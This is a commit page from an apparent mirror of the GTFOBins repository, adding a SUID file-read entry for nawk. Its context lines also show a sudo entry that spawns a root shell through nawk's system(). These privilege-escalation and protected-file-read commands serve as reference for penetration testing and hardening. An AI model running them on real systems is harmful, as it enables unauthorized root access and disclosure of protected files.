mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add SUID category to nawk as file read
This commit is contained in:
parent
c293ed20f7
commit
d6d3563e5d
@ -27,6 +27,10 @@ functions:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
nawk '//' "$LFILE"
|
||||
suid:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
./nawk '//' "$LFILE"
|
||||
sudo:
|
||||
- code: sudo nawk 'BEGIN {system("/bin/sh")}'
|
||||
limited-suid:
|
||||
|
Loading…
Reference in New Issue
Block a user